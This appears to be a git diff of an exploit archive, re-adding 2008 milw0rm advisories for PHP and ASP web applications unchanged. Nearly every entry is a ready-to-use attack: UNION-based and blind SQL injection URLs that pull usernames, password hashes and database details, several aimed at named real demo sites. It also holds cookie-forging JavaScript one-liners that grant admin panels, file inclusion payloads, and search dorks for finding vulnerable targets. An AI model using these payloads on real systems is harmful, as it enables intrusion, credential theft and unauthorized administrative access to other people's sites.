-#                   ___________   ______  _  __                # 
-#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
-#                 \  \___|  | \/\  ___/\     /                 # 
-#                  \___  >__|    \___  >\/\_/                  # 
-#      est.2007        \/            \/   forum.darkc0de.com   # 
-################################################################ 
-# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - r45s4l    # 
-#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE                #
-#                   and all darkc0de members                ---# 
-################################################################ 
-# 
-# Author: Beenu Arora
-# 
-# Home  : www.BeenuArora.com 
-# 
-# Email : beenudel1986@gmail.com 
-# 
-# Share the c0de! 
-# 
-################################################################ 
-# 
-# Title: harlandscripts Mypage.php Sql Injection 
-
-#
-# Vendor: http://www.harlandscripts.com/ ( Paid Script )
-
-# 
-#
-###########################################################
-#
-# d0rk:Powered by HarlandScripts.com
-#
-###########################################################
- 
-        
-     
-     Live Demo: 
-	http://traffic.cyberaction.biz/mypage.php?trg=1142+and+1=2+union+select+1,2,3,user(),concat(0x3a,database()),6,7,8,9,10,11,12,13,14,15,version(),17,18,19,20,21,22,23,24,25,26,27,28--
-
-     
-
-###########################################################
-#
-#  Bug discovered : 29 Oct.2008
-###########################################################
-
-# milw0rm.com [2008-10-29]
+################################################################ 
+#       .___             __          _______       .___        # 
+#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
+#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
+#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
+#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
+#        \/                  \/             \/                 # 
+#                   ___________   ______  _  __                # 
+#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
+#                 \  \___|  | \/\  ___/\     /                 # 
+#                  \___  >__|    \___  >\/\_/                  # 
+#      est.2007        \/            \/   forum.darkc0de.com   # 
+################################################################ 
+# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - r45s4l    # 
+#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE                #
+#                   and all darkc0de members                ---# 
+################################################################ 
+# 
+# Author: Beenu Arora
+# 
+# Home  : www.BeenuArora.com 
+# 
+# Email : beenudel1986@gmail.com 
+# 
+# Share the c0de! 
+# 
+################################################################ 
+# 
+# Title: harlandscripts Mypage.php Sql Injection 
+
+#
+# Vendor: http://www.harlandscripts.com/ ( Paid Script )
+
+# 
+#
+###########################################################
+#
+# d0rk:Powered by HarlandScripts.com
+#
+###########################################################
+ 
+        
+     
+     Live Demo: 
+	http://traffic.cyberaction.biz/mypage.php?trg=1142+and+1=2+union+select+1,2,3,user(),concat(0x3a,database()),6,7,8,9,10,11,12,13,14,15,version(),17,18,19,20,21,22,23,24,25,26,27,28--
+
+     
+
+###########################################################
+#
+#  Bug discovered : 29 Oct.2008
+###########################################################
+
+# milw0rm.com [2008-10-29]
diff --git a/platforms/php/webapps/6876.txt b/platforms/php/webapps/6876.txt
index 126b5e5d7..68642acf8 100755
--- a/platforms/php/webapps/6876.txt
+++ b/platforms/php/webapps/6876.txt
@@ -1,41 +1,41 @@
-Booking System for Hotels Group  powered by Venalsur Bookingcenter  XSS/SQL injetion vulnerability!
-------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------
-Author:   d3b4g
-
-Greetz:   str0ke,,Darkc0de.com,rez0rn,draconyx,godinlaw,hatebreeder And all my friends
-Site   :  www.bl4ck3nd.info
-Contact:  bl4ckend[at]gmail[dot]com
--------------------------------------------------------------------
-
-
--------------------------------------------------------------------
-Dork:         N/A
--------------------------------------------------------------------
-Affected software:
-
------------------
-Application : Booking System for Hotels Group powered by Venalsur Bookingcenter
-URL :  http://www.bookingcentre.eu
-===================================================================
-
-Sql injection
-=============
-
-
-Exploit: http://site.com/www_en/cadena_ofertas_ext.php?OfertaID= [sql]
-
-Demo   : http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID=-1+union+all+select+1,2,3,concat(username,password),5,6,7,8,9,10,11+from+members/*
-
-------------------------------------------------------------------------
-
-Xss
-===
-
-Exploit:http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID=
-
-=========================================================================
-
-Proud to be a maldivian :):) Happy new maldives [29.10.2008]
-
-# milw0rm.com [2008-10-29]
+Booking System for Hotels Group  powered by Venalsur Bookingcenter  XSS/SQL injetion vulnerability!
+------------------------------------------------------------------------------------------------------
+------------------------------------------------------------------------------------------------------
+Author:   d3b4g
+
+Greetz:   str0ke,,Darkc0de.com,rez0rn,draconyx,godinlaw,hatebreeder And all my friends
+Site   :  www.bl4ck3nd.info
+Contact:  bl4ckend[at]gmail[dot]com
+-------------------------------------------------------------------
+
+
+-------------------------------------------------------------------
+Dork:         N/A
+-------------------------------------------------------------------
+Affected software:
+
+-----------------
+Application : Booking System for Hotels Group powered by Venalsur Bookingcenter
+URL :  http://www.bookingcentre.eu
+===================================================================
+
+Sql injection
+=============
+
+
+Exploit: http://site.com/www_en/cadena_ofertas_ext.php?OfertaID= [sql]
+
+Demo   : http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID=-1+union+all+select+1,2,3,concat(username,password),5,6,7,8,9,10,11+from+members/*
+
+------------------------------------------------------------------------
+
+Xss
+===
+
+Exploit:http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID=
+
+=========================================================================
+
+Proud to be a maldivian :):) Happy new maldives [29.10.2008]
+
+# milw0rm.com [2008-10-29]
diff --git a/platforms/php/webapps/6877.txt b/platforms/php/webapps/6877.txt
index 522de7716..26ffe7e54 100755
--- a/platforms/php/webapps/6877.txt
+++ b/platforms/php/webapps/6877.txt
@@ -1,47 +1,47 @@
-|___________________________________________________
-|  Pro Traffic One( poll_results.php id) Remote SQL Injection Vulnerability
-|___________________________________________________
-|--------------------   IQ-SecuritY  -------------------
-|
-|    Author: Hussin X
-|
-|    Home :  WwW.IQ-ty.CoM
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|___________________________________________________
-|                                                                                                    
-|
-| script :  http://www.webmasterdownload.com/
-|
-| DorK   :  :)
-|___________________________________________________
-
-Exploit:
-________
-
-
-www.[target].com/Script/poll_results.php?id=-1+union+select+1,concat(version(),0x3e,user())--
-
-
-Demo
-________
-
-http://www.free4newbies.com/pro-traffic/poll_results.php?id=-1+union+select+1,concat(version(),0x3e,user())--
-
-
-
-
-____________________________( Greetz )_________________________________________
-|
-|  All members of the Forum IQ-SecuritY  WwW.IQ-ty.CoM | AnD TrYaG  WwW.TrYaG.CC
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
-|
-|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
-|___________________________________________________________________________
-
-
-                   Im IRAQi    |    Im TrYaGi
-
-# milw0rm.com [2008-10-29]
+|___________________________________________________
+|  Pro Traffic One( poll_results.php id) Remote SQL Injection Vulnerability
+|___________________________________________________
+|--------------------   IQ-SecuritY  -------------------
+|
+|    Author: Hussin X
+|
+|    Home :  WwW.IQ-ty.CoM
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|___________________________________________________
+|                                                                                                    
+|
+| script :  http://www.webmasterdownload.com/
+|
+| DorK   :  :)
+|___________________________________________________
+
+Exploit:
+________
+
+
+www.[target].com/Script/poll_results.php?id=-1+union+select+1,concat(version(),0x3e,user())--
+
+
+Demo
+________
+
+http://www.free4newbies.com/pro-traffic/poll_results.php?id=-1+union+select+1,concat(version(),0x3e,user())--
+
+
+
+
+____________________________( Greetz )_________________________________________
+|
+|  All members of the Forum IQ-SecuritY  WwW.IQ-ty.CoM | AnD TrYaG  WwW.TrYaG.CC
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
+|___________________________________________________________________________
+
+
+                   Im IRAQi    |    Im TrYaGi
+
+# milw0rm.com [2008-10-29]
diff --git a/platforms/php/webapps/6879.txt b/platforms/php/webapps/6879.txt
index fdfd3784c..288b0c25f 100755
--- a/platforms/php/webapps/6879.txt
+++ b/platforms/php/webapps/6879.txt
@@ -1,29 +1,29 @@
-/*
-    -----------------------------------------------------------------------------------
-    MyPHP Forum (Final) <= 3.0 (Edit Topics/Blind SQL Injection) Remote Vulnerabilities
-    -----------------------------------------------------------------------------------
-    Discovered By StAkeR[at]hotmail[dot]it
-    Download On http://www.myphp.ws/
-    
-
-   - member.php (confirm - Blind SQL Injection)
-   - member.php?action=confirm&id=' or ascii(substring((select password from nb_member where uid=1),1,1))=98/* 
- 
-   - member.php (newconfirm - Blind SQL Injection)
-   - member.php?action=newconfirm&user=' or ascii(substring((select password from nb_member where uid=1),1,1))=98--
-    
-   - member.php?action=reqpwd  (reqpwd - Blind SQL Injection)
-   - insert  ' or ascii(substring((select password from nb_member where uid=1),1,1))=98#
-    
-   - post.php (post Blind SQL Injection)
-   - post.php?action=post&fid=1&tid=1"e=' or ascii(substring((select password from nb_member where uid=1),1,1))=9%23
-    
-   - post.php (edit - Edit Topics)
-   - post.php?action=edit&fid=1&tid=1&pid=[id topic] ' or '1=1
-        
-    
-    
-    
-/*    
-
-# milw0rm.com [2008-10-30]
+/*
+    -----------------------------------------------------------------------------------
+    MyPHP Forum (Final) <= 3.0 (Edit Topics/Blind SQL Injection) Remote Vulnerabilities
+    -----------------------------------------------------------------------------------
+    Discovered By StAkeR[at]hotmail[dot]it
+    Download On http://www.myphp.ws/
+    
+
+   - member.php (confirm - Blind SQL Injection)
+   - member.php?action=confirm&id=' or ascii(substring((select password from nb_member where uid=1),1,1))=98/* 
+ 
+   - member.php (newconfirm - Blind SQL Injection)
+   - member.php?action=newconfirm&user=' or ascii(substring((select password from nb_member where uid=1),1,1))=98--
+    
+   - member.php?action=reqpwd  (reqpwd - Blind SQL Injection)
+   - insert  ' or ascii(substring((select password from nb_member where uid=1),1,1))=98#
+    
+   - post.php (post Blind SQL Injection)
+   - post.php?action=post&fid=1&tid=1"e=' or ascii(substring((select password from nb_member where uid=1),1,1))=9%23
+    
+   - post.php (edit - Edit Topics)
+   - post.php?action=edit&fid=1&tid=1&pid=[id topic] ' or '1=1
+        
+    
+    
+    
+/*    
+
+# milw0rm.com [2008-10-30]
diff --git a/platforms/php/webapps/6881.txt b/platforms/php/webapps/6881.txt
index 2f3c24cdb..b612d6dac 100755
--- a/platforms/php/webapps/6881.txt
+++ b/platforms/php/webapps/6881.txt
@@ -1,35 +1,35 @@
-###############################################################################################
- _____    ____   __  ___    ______   ______       |   ____   _____     _____
-|        / ___|  \ \ / /   / ____|  /      |      |  |      |  _  \   |
-|_____  | |  _    \ V /    | |      |      |   ___|  |_____ | |_)  |  |_____
-|       | |_ ||    | |     | |____  |      |  |   |  |      |   _  |        |
-|_____   \____|    |_|      \_____|  \_____/  |___|  |____  |__| \_\  ______|
-
-# Author : Hakxer
-# Home : Www.educ-up.com
-# Type Gap : Insecure cookie handling 
-# script : Absloute File Send [see script] http://www.xigla.com/afilesend/demo.htm
-# Greetz : Allah , Egyptian x Hacker , all my team , All educ-up member
-# Team : EgY Coders 
-#################################################################################################
-
-# Dork : "Powered by Absolute File Send"
-
-# First go to Admin panel : http://www.xigla.com/afilesend/demo/login.aspx
-# Exploit :
-# [~]  javascript:document.cookie="xlaAFSuser=p=admin";
-# Second Go to http://www.xigla.com/afilesend/demo/menu.aspx
-# See Admin panel .. 
-
-# Have Fun :D
-
-
-###############################################################################
-
--------------------------------- The End of Gap -----------------------------------
-
-## Contact : aq5@windowslive.com
-### Muslim Hacker .. I love you Mohammed Rasull Allah 
-######################################################
-
-# milw0rm.com [2008-10-30]
+###############################################################################################
+ _____    ____   __  ___    ______   ______       |   ____   _____     _____
+|        / ___|  \ \ / /   / ____|  /      |      |  |      |  _  \   |
+|_____  | |  _    \ V /    | |      |      |   ___|  |_____ | |_)  |  |_____
+|       | |_ ||    | |     | |____  |      |  |   |  |      |   _  |        |
+|_____   \____|    |_|      \_____|  \_____/  |___|  |____  |__| \_\  ______|
+
+# Author : Hakxer
+# Home : Www.educ-up.com
+# Type Gap : Insecure cookie handling 
+# script : Absloute File Send [see script] http://www.xigla.com/afilesend/demo.htm
+# Greetz : Allah , Egyptian x Hacker , all my team , All educ-up member
+# Team : EgY Coders 
+#################################################################################################
+
+# Dork : "Powered by Absolute File Send"
+
+# First go to Admin panel : http://www.xigla.com/afilesend/demo/login.aspx
+# Exploit :
+# [~]  javascript:document.cookie="xlaAFSuser=p=admin";
+# Second Go to http://www.xigla.com/afilesend/demo/menu.aspx
+# See Admin panel .. 
+
+# Have Fun :D
+
+
+###############################################################################
+
+-------------------------------- The End of Gap -----------------------------------
+
+## Contact : aq5@windowslive.com
+### Muslim Hacker .. I love you Mohammed Rasull Allah 
+######################################################
+
+# milw0rm.com [2008-10-30]
diff --git a/platforms/php/webapps/6882.txt b/platforms/php/webapps/6882.txt
index 91d247f54..e22ae586b 100755
--- a/platforms/php/webapps/6882.txt
+++ b/platforms/php/webapps/6882.txt
@@ -1,38 +1,38 @@
-###############################################################################################
- _____    ____   __  ___    ______   ______       |   ____   _____     _____
-|        / ___|  \ \ / /   / ____|  /      |      |  |      |  _  \   |
-|_____  | |  _    \ V /    | |      |      |   ___|  |_____ | |_)  |  |_____
-|       | |_ ||    | |     | |____  |      |  |   |  |      |   _  |        |
-|_____   \____|    |_|      \_____|  \_____/  |___|  |____  |__| \_\  ______|
-
-# Discovered By : Hakxer
-# Home : Www.educ-up.com
-# Type Gap : Insecure cookie handling 
-# script : Absloute Podcast V 1.0 [see script] http://www.xigla.com/apodcasting/demo.htm
-# Greetz : Allah , Egyptian x Hacker , all my team , All educ-up member
-# Team : EgY Coders 
-#################################################################################################
-
-# Dork : "Powered by Absolute Podcast "
-
-# Poc 
-==> javascript:document.cookie="xlaAPCuser=userid=1&lvl=1&s=";
-
-# Live Script 
-
-# First go to Admin panel : http://www.xigla.com/apodcasting/demo/login.aspx
-# [~]  javascript:document.cookie="xlaAPCuser=userid=1&lvl=1&s=";
-# Second Go to http://www.xigla.com/apodcasting/demo/menu.aspx
-# See Admin panel .. 
-
-# Have Fun :D
-
-###############################################################################
-
--------------------------------- The End of Gap -----------------------------------
-
-## Contact : aq5@windowslive.com
-### Muslim Hacker .. I love you Mohammed Rasull Allah 
-######################################################
-
-# milw0rm.com [2008-10-30]
+###############################################################################################
+ _____    ____   __  ___    ______   ______       |   ____   _____     _____
+|        / ___|  \ \ / /   / ____|  /      |      |  |      |  _  \   |
+|_____  | |  _    \ V /    | |      |      |   ___|  |_____ | |_)  |  |_____
+|       | |_ ||    | |     | |____  |      |  |   |  |      |   _  |        |
+|_____   \____|    |_|      \_____|  \_____/  |___|  |____  |__| \_\  ______|
+
+# Discovered By : Hakxer
+# Home : Www.educ-up.com
+# Type Gap : Insecure cookie handling 
+# script : Absloute Podcast V 1.0 [see script] http://www.xigla.com/apodcasting/demo.htm
+# Greetz : Allah , Egyptian x Hacker , all my team , All educ-up member
+# Team : EgY Coders 
+#################################################################################################
+
+# Dork : "Powered by Absolute Podcast "
+
+# Poc 
+==> javascript:document.cookie="xlaAPCuser=userid=1&lvl=1&s=";
+
+# Live Script 
+
+# First go to Admin panel : http://www.xigla.com/apodcasting/demo/login.aspx
+# [~]  javascript:document.cookie="xlaAPCuser=userid=1&lvl=1&s=";
+# Second Go to http://www.xigla.com/apodcasting/demo/menu.aspx
+# See Admin panel .. 
+
+# Have Fun :D
+
+###############################################################################
+
+-------------------------------- The End of Gap -----------------------------------
+
+## Contact : aq5@windowslive.com
+### Muslim Hacker .. I love you Mohammed Rasull Allah 
+######################################################
+
+# milw0rm.com [2008-10-30]
diff --git a/platforms/php/webapps/6883.txt b/platforms/php/webapps/6883.txt
index e0967ea06..738d5924f 100755
--- a/platforms/php/webapps/6883.txt
+++ b/platforms/php/webapps/6883.txt
@@ -1,38 +1,38 @@
-###############################################################################################
- _____    ____   __  ___    ______   ______       |   ____   _____     _____
-|        / ___|  \ \ / /   / ____|  /      |      |  |      |  _  \   |
-|_____  | |  _    \ V /    | |      |      |   ___|  |_____ | |_)  |  |_____
-|       | |_ ||    | |     | |____  |      |  |   |  |      |   _  |        |
-|_____   \____|    |_|      \_____|  \_____/  |___|  |____  |__| \_\  ______|
-
-# Discovered By : Hakxer
-# Home : Www.educ-up.com
-# Type Gap : Insecure cookie handling 
-# script : Absolute Poll Manager XE v 4.1 [see script] http://www.xigla.com/absolutepm/demo.htm
-# Greetz : Allah , Egyptian x Hacker , all my team , All educ-up member
-# Team : EgY Coders 
-#################################################################################################
-
-# Dork : " Absolute Poll Manager XE "
-
-# Poc 
-==> javascript:document.cookie="xlaAPM%5Fusr=administrator";
-
-# Demo Script < Test> 
-
-# First go to Admin panel : http://www.xigla.com/absolutepm/xlaabsolutepm/login.asp
-# [~] Exploit this : javascript:document.cookie="xlaAPM%5Fusr=administrator";
-# And Go to http://www.xigla.com/absolutepm/xlaabsolutepm/menu.asp
-# See Admin panel .. 
-
-# Have Fun :D
-
-###############################################################################
-
--------------------------------- The End of Gap -----------------------------------
-
-## Contact : aq5@windowslive.com
-### Muslim Hacker .. I love you Mohammed Rasull Allah 
-######################################################
-
-# milw0rm.com [2008-10-30]
+###############################################################################################
+ _____    ____   __  ___    ______   ______       |   ____   _____     _____
+|        / ___|  \ \ / /   / ____|  /      |      |  |      |  _  \   |
+|_____  | |  _    \ V /    | |      |      |   ___|  |_____ | |_)  |  |_____
+|       | |_ ||    | |     | |____  |      |  |   |  |      |   _  |        |
+|_____   \____|    |_|      \_____|  \_____/  |___|  |____  |__| \_\  ______|
+
+# Discovered By : Hakxer
+# Home : Www.educ-up.com
+# Type Gap : Insecure cookie handling 
+# script : Absolute Poll Manager XE v 4.1 [see script] http://www.xigla.com/absolutepm/demo.htm
+# Greetz : Allah , Egyptian x Hacker , all my team , All educ-up member
+# Team : EgY Coders 
+#################################################################################################
+
+# Dork : " Absolute Poll Manager XE "
+
+# Poc 
+==> javascript:document.cookie="xlaAPM%5Fusr=administrator";
+
+# Demo Script < Test> 
+
+# First go to Admin panel : http://www.xigla.com/absolutepm/xlaabsolutepm/login.asp
+# [~] Exploit this : javascript:document.cookie="xlaAPM%5Fusr=administrator";
+# And Go to http://www.xigla.com/absolutepm/xlaabsolutepm/menu.asp
+# See Admin panel .. 
+
+# Have Fun :D
+
+###############################################################################
+
+-------------------------------- The End of Gap -----------------------------------
+
+## Contact : aq5@windowslive.com
+### Muslim Hacker .. I love you Mohammed Rasull Allah 
+######################################################
+
+# milw0rm.com [2008-10-30]
diff --git a/platforms/php/webapps/6885.txt b/platforms/php/webapps/6885.txt
index aadf168fe..239b5d7dd 100755
--- a/platforms/php/webapps/6885.txt
+++ b/platforms/php/webapps/6885.txt
@@ -1,39 +1,39 @@
-e107 Plugin lyrics_menu lyrics_song.php (l_id) Remote Sql inj
-
-author: ZoRLu
-
-home: z0rlu.blogspot.com 
-
-concat: trt-turk@hotmail.com
-
-date: 30/10/2008 ( saat 23:36 the_k@m!l'lerdeyim a.q :) )
-
-n0te: YALNIZLIK YiTiRDi ANLAMINI YALNIZLIGIMDA  : ( (
-
-n0te: a.q kpss : ) )
-
-dork: allinurl:"lyrics_menu/lyrics_song.php?l_id="
-
-exploit:
-
-http://localhost/script_path/lyrics_song.php?l_id=[SQL1] or [SQL2]
-
-[SQL1] = column number 15
-
--1+union+select+1,concat(user_name,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+e107_user--
-
-example 1:
-
-http://www.mirage.org/e107_plugins/lyrics_menu/lyrics_song.php?l_id=-1+union+select+1,concat(user_name,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15++from+e107_user--
-
-[SQL2] = column number 17
-
--1+union+select+1,2,3,concat(user(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17--
-
-example 2:
-
-http://www.reklamadatbazis.hu/e107_plugins/lyrics_menu/lyrics_song.php?l_id=-1+union+select+1,2,3,concat(user(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17--
-
-thanks: str0ke
-
-# milw0rm.com [2008-10-31]
+e107 Plugin lyrics_menu lyrics_song.php (l_id) Remote Sql inj
+
+author: ZoRLu
+
+home: z0rlu.blogspot.com 
+
+concat: trt-turk@hotmail.com
+
+date: 30/10/2008 ( saat 23:36 the_k@m!l'lerdeyim a.q :) )
+
+n0te: YALNIZLIK YiTiRDi ANLAMINI YALNIZLIGIMDA  : ( (
+
+n0te: a.q kpss : ) )
+
+dork: allinurl:"lyrics_menu/lyrics_song.php?l_id="
+
+exploit:
+
+http://localhost/script_path/lyrics_song.php?l_id=[SQL1] or [SQL2]
+
+[SQL1] = column number 15
+
+-1+union+select+1,concat(user_name,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+e107_user--
+
+example 1:
+
+http://www.mirage.org/e107_plugins/lyrics_menu/lyrics_song.php?l_id=-1+union+select+1,concat(user_name,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15++from+e107_user--
+
+[SQL2] = column number 17
+
+-1+union+select+1,2,3,concat(user(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17--
+
+example 2:
+
+http://www.reklamadatbazis.hu/e107_plugins/lyrics_menu/lyrics_song.php?l_id=-1+union+select+1,2,3,concat(user(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17--
+
+thanks: str0ke
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6886.txt b/platforms/php/webapps/6886.txt
index 9d918374e..6a298b5ee 100755
--- a/platforms/php/webapps/6886.txt
+++ b/platforms/php/webapps/6886.txt
@@ -1,42 +1,42 @@
-biqcms 5.0.9a (beta) Insecure Cookie Handling Vulnerability
-[~]
-[~] donwload: http://sourceforge.net/project/showfiles.php?group_id=143555&package_id=232638&release_id=636935
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 30.10.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~] 
-[~] N0T: a.q kpss : ) )
-[~]
-[~] -----------------------------------------------------------
-
-code:
-
-        setcookie ("COOKIE_LAST_ADMIN_USER", $newAdmin["username"], time()+8640000, '/');
-        setcookie ("COOKIE_LAST_ADMIN_LANG", $newAdmin["use_language_id"], time()+8640000, '/');
-
-
-Exploit:
-
-javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=real_admin_name; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";
-
-example for my localhost:
-
-javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=zorlu; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  r00tsecurity.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-
-# milw0rm.com [2008-10-31]
+biqcms 5.0.9a (beta) Insecure Cookie Handling Vulnerability
+[~]
+[~] donwload: http://sourceforge.net/project/showfiles.php?group_id=143555&package_id=232638&release_id=636935
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 30.10.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~] 
+[~] N0T: a.q kpss : ) )
+[~]
+[~] -----------------------------------------------------------
+
+code:
+
+        setcookie ("COOKIE_LAST_ADMIN_USER", $newAdmin["username"], time()+8640000, '/');
+        setcookie ("COOKIE_LAST_ADMIN_LANG", $newAdmin["use_language_id"], time()+8640000, '/');
+
+
+Exploit:
+
+javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=real_admin_name; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";
+
+example for my localhost:
+
+javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=zorlu; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  r00tsecurity.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6887.txt b/platforms/php/webapps/6887.txt
index 51d16f2ce..5edfbb110 100755
--- a/platforms/php/webapps/6887.txt
+++ b/platforms/php/webapps/6887.txt
@@ -1,12 +1,12 @@
-Script Name : Cybershare CMS
- 
-Download : http://sourceforge.net/project/downloading.php?group_id=213056&use_mirror=surfnet&filename=cybershade_0.2b-DEV.zip&40561526
- 
-Error :
-include $CMS_ROOT."core/core.php";
- 
-Vul. Code : htp://[site]/[path]/core/includes.php?CMS_ROOT=[Shell]
- 
-Thanks : Kezzap66345 - Septemb0x
-
-# milw0rm.com [2008-10-31]
+Script Name : Cybershare CMS
+ 
+Download : http://sourceforge.net/project/downloading.php?group_id=213056&use_mirror=surfnet&filename=cybershade_0.2b-DEV.zip&40561526
+ 
+Error :
+include $CMS_ROOT."core/core.php";
+ 
+Vul. Code : htp://[site]/[path]/core/includes.php?CMS_ROOT=[Shell]
+ 
+Thanks : Kezzap66345 - Septemb0x
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6888.txt b/platforms/php/webapps/6888.txt
index 060a56bb4..2e0bcecc0 100755
--- a/platforms/php/webapps/6888.txt
+++ b/platforms/php/webapps/6888.txt
@@ -1,34 +1,34 @@
- _____   ____   __   __     _       ____        ____    ____ 
-|_   _| |  _ \  \ \ / /    / \     / ___|      / ___|  / ___|
-  | |   | |_) |  \ V /    / _ \   | |  _      | |     | |    
-  | |   |  _ <    | |    / ___ \  | |_| |  _  | |___  | |___ 
-  |_|   |_| \_\   |_|   /_/   \_\  \____| (_)  \____|  \____|
-                                                            
-
-Tribiqcms 5.0.10a (beta) Local File Inclusion Vulnerability
-
-Vuln Code In : /Community-5.0.10a/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php
-
-
-
-POC :
-/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php?template_path=Local File %00
-
-        ____           _           _           __  __ 
-       / ___|   ___   | |       __| |         |  \/  |
-      | |  _   / _ \  | |      / _` |         | |\/| |
-      | |_| | | (_) | | |___  | (_| |         | |  | |
-       \____|  \___/  |_____|  \__,_|  _____  |_|  |_|
-                                      |_____|         
-
-# milw0rm.com [2008-10-31]
+ _____   ____   __   __     _       ____        ____    ____ 
+|_   _| |  _ \  \ \ / /    / \     / ___|      / ___|  / ___|
+  | |   | |_) |  \ V /    / _ \   | |  _      | |     | |    
+  | |   |  _ <    | |    / ___ \  | |_| |  _  | |___  | |___ 
+  |_|   |_| \_\   |_|   /_/   \_\  \____| (_)  \____|  \____|
+                                                            
+
+Tribiqcms 5.0.10a (beta) Local File Inclusion Vulnerability
+
+Vuln Code In : /Community-5.0.10a/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php
+
+
+
+POC :
+/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php?template_path=Local File %00
+
+        ____           _           _           __  __ 
+       / ___|   ___   | |       __| |         |  \/  |
+      | |  _   / _ \  | |      / _` |         | |\/| |
+      | |_| | | (_) | | |___  | (_| |         | |  | |
+       \____|  \___/  |_____|  \__,_|  _____  |_|  |_|
+                                      |_____|         
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6889.txt b/platforms/php/webapps/6889.txt
index 4a78badce..d6f43e30f 100755
--- a/platforms/php/webapps/6889.txt
+++ b/platforms/php/webapps/6889.txt
@@ -1,25 +1,25 @@
-###############################################################################################
- _____    ____   __  ___    ______   ______       |   ____   _____     _____
-|        / ___|  \ \ / /   / ____|  /      |      |  |      |  _  \   |
-|_____  | |  _    \ V /    | |      |      |   ___|  |_____ | |_)  |  |_____
-|       | |_ ||    | |     | |____  |      |  |   |  |      |   _  |        |
-|_____   \____|    |_|      \_____|  \_____/  |___|  |____  |__| \_\  ______|
-
-[~] Author : Hakxer
-[~] Home : Www.educ-up.com
-[~] Type Gap : Insecure Cookie Handling
-[~] script : Absolute Content Rotator 6.0 [see script] http://www.xigla.com/absolutecr/demo.htm
-[~] Team : EgY Coders 
-#################################################################################################
-
-Exploit : First go to http://www.xigla.com/absolutecr/demo/login.aspx
-Second Execute 
-[~] javascript:document.cookie="xlaACRDEMOuser=userid=1&lvl=1&s=";
-Now Go to http://www.xigla.com/absolutecr/demo/menu.aspx
-
-
---- Proud To Be A Muslim ---
-
-# _=END=_ # 
-
-# milw0rm.com [2008-10-31]
+###############################################################################################
+ _____    ____   __  ___    ______   ______       |   ____   _____     _____
+|        / ___|  \ \ / /   / ____|  /      |      |  |      |  _  \   |
+|_____  | |  _    \ V /    | |      |      |   ___|  |_____ | |_)  |  |_____
+|       | |_ ||    | |     | |____  |      |  |   |  |      |   _  |        |
+|_____   \____|    |_|      \_____|  \_____/  |___|  |____  |__| \_\  ______|
+
+[~] Author : Hakxer
+[~] Home : Www.educ-up.com
+[~] Type Gap : Insecure Cookie Handling
